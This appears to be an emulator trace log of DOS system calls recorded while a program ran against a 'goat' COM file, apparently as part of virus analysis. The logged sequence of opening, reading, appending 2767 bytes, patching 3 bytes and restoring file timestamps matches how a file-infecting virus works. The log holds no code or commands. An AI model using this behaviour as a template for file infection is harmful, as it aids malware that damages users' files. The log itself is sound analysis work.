2018-12-25T11:52:09.61563939Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.617335519Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.623821228Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.632972027Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.634649417Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.63923367Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.647615155Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.661854536Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.681547164Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.683180474Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.706895462Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.72637788Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.728008235Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.731023775Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.738666457Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.74844841Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.755812774Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.758709955Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.765890426Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.767601096Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.771512414Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.773243417Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.779080421Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.787651914Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.790032899Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.798527229Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.800894028Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.804927924Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.806584971Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.809027034Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.817131444Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.826906744Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.832389745Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.844205209Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.847067746Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.853427984Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.855550678Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.866146983Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.869427931Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.873381069Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')